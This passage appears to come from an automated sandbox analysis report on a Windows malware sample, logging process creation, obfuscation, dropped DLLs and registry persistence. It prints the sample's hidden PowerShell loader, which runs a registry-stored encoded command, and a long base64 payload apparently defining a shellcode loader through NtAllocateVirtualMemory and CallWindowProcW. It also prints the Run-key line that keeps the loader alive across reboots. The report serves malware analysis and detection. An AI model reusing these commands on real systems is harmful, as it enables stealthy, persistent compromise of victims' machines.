BmACAASQBuAHQAMwAyACAAUwBjAHIAaQBwAHQAZQByAGUALABpAG4AdAAgAEwAZQBqAG4AaQA2ACwAaQBuAHQAIABTAGMAcgBpAHAAdABlAHIAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFAAcwBlAHUANAAsAHUAaQBuAHQAIABsAGkAbgBqAGUAcgAsAGkAbgB0ACAAUwBUAFIAWQAsAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUAMAAsAGkAbgB0ACAAUwBFAEUAUgBOAEUALABpAG4AdAAgAFAAYQBjAGkAZgBpAGMAZQByADcALABpAG4AdAAgAEEAZAB2AGkAcwBlAG4AcwA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMAAsAHUAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADEALABJAG4AdABQAHQAcgAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMgAsAHIAZQBmACAASQBuAHQAMwAyACAAQQBVAFQATwBBAEMAVABJAFYARQAzACwAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEEAVQBUAE8AQQBDAFQASQBWAEUANQAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQA2ACwAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADcALABpAG4AdAAgAEEAVQBUAE8AQQBDAFQASQBWAEUAOAAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAHIAZQBmAHIAIABDAGEAbgBjAGUAcgBpAG4AYwBvACAATABpAG4AZwB1AGEAdAB1AGwAIABoAGUAYQBsAGUAIABMAEUAVgBJAEcAQQBUACAATABJAEcASwBJAFMAVABFACAAcwB2AG8AdgBsAC Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Retrocogni8=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Rickey;powershell.exe -windowstyle hidden -encodedcommand($Retrocogni8) Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBhAGcAcgB5ACAAUwBjAHIAaQB2AGUAbgAgAHMAeQBzAHQAZQBtAGsAbwAgAFQAcgBlAGQAagBlADUAIABDAGgAcgBvAG0AaQA4ACAAQgBJAEIATAAgAE8AdgBlAHIAcwB0AHIAZQA3ACAAcAByAGUAYwAgAEYAbwByAGwAaQBnAHMAaQBuADIAIABCAGUAbgBlAGYAaQB0ACAAQQBwAG8AdABoAGUAbwBzAGkAegAgAHUAZABlAHQAaQBsACAATABPAE8AUwBFACAAQgByAG4AZQB2AGUAOQAgAFQAbwBuAHMAaQAyACAAVAByAG8AcABpAHMAIABQAGwAZQB1AHIAbwBsAGkANAAgAGIAbABrAGsAIABDAHkAcwB0AGkAYwBlACAAVQBuAGQAZQByAHIAZQBwAG8AcgAxACAAUAByAG8AYwB1AGwAYwBhAHQAIABQAEEAUwBUAE8AUgAgAFMAYQBuAGcAIABjAG8AbQBiAGEAcgBvAG4AZgBvACAAbwBtAHAAcgAgAEQAYQBtAG4AZQBkADgAIABOAEUAUABIACAARgByAHUAaQB0AGkAdgBlAHIAZQAgAEQARQBGAEEASQBUAEkAUwAgAE0AaQBzAGsAZQBuAGQAZQA1ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGMAcgBpAHAAdABlAHIAZQAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUANgAsAHIAZQBmACAASQBuAHQAMwAyACAAVABoAGUAbwByAGkAcwBlAHIAMgAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBjAHIAaQBwAHQAZQByAGUALABpAG4AdAAgAEwAZQBqAG4AaQA2ACwAaQBuAHQAIABTAGMAcgBpAHAAdABlAHIAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFAAcwBlAHUANAAsAHUAaQBuAHQAIABsAGkAbgBqAGUAcgAsAGkAbgB0ACAAUwBUAFIAWQAsAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUAMAAsAGkAbgB0ACAAUwBFAEUAUgBOAEUALABpAG4AdAAgAFAAYQBjAGkAZgBpAGMAZQByADcALABpAG4AdAAgAEEAZAB2AGkAcwBlAG4AcwA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMAAsAHUAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADEALABJAG4AdABQAHQAcgAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMgAsAHIAZQBmACAASQBuAHQAMwAyACAAQQBVAFQATwBBAEMAVABJAFYARQAzACwAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEEAVQBUAE8AQQBDAFQASQBWAEUANQAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQA2ACwAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADcALABpAG4AdAAgAEEAVQBUAE8AQQBDAFQASQBWAEUAOAAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAHIAZQBmAHIAIABDAGEAbgBjAGUAcgBpAG4AYwBvACAATABpAG4AZwB1AGEAdAB1AGwAIABoAGUAYQBsAGUAIABMAEUAVgBJAEcAQQBUACAATABJAEcASwBJAFMAVABFACAAcwB2AG8AdgBsAC Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_012540C9 push esp; ret 12_2_012540DD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_077CDE82 push 8B05985Ah; iretd 12_2_077CDE87
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_077CDDC9 push 8B05985Ah; iretd 12_2_077CDDCE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_077CDBD4 push 8B05985Ah; iretd 12_2_077CDBD9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_07491420 pushad ; retf 0069h 28_2_07491425
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 29_2_0795B6D0 push eax; mov dword ptr [esp], edx 29_2_0795B6E4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 29_2_079559C8 push eax; mov dword ptr [esp], edx 29_2_079559DC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 29_2_079673B0 pushfd ; retf 29_2_07967439
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 29_2_07961290 push eax; mov dword ptr [esp], edx 29_2_07961434
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 29_2_07A5ED27 push ss; iretd 29_2_07A5ED2A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 29_2_07A5CC88 push es; iretd 29_2_07A5CC8A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 29_2_07A5CC8B push es; iretd 29_2_07A5CC92
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 29_2_07A5ECE9 push ss; iretd 29_2_07A5ECEA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 29_2_07A5EC28 push ss; iretd 29_2_07A5EC2A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 29_2_07A5CC11 push es; iretd 29_2_07A5CC12
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 29_2_07A5EB78 push ss; iretd 29_2_07A5EB7A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 29_2_07A5EB7B push ss; iretd 29_2_07A5EB82
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 29_2_07A5FE4B push es; ret 29_2_07A5FE50
Compiles C# or VB.Net code
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tm43worv.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yy0zjl34.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tm43worv.cmdline Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yy0zjl34.cmdline

Persistence and Installation Behavior
barindex
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\yy0zjl34.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\tm43worv.dll Jump to dropped file

Boot Survival
barindex
Creates an autostart registry key pointing to binary in C:\Windows
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run opklbedebi Jump to behavior
Creates autostart registry keys with suspicious values (likely registry only malware)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run opklbedebi cmd /c start /b c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Retrocogni8=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Rickey;powershell.exe -windowstyle hidden -encodedcommand($Retrocogni8) Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run opklbedebi Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run opklbedebi Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
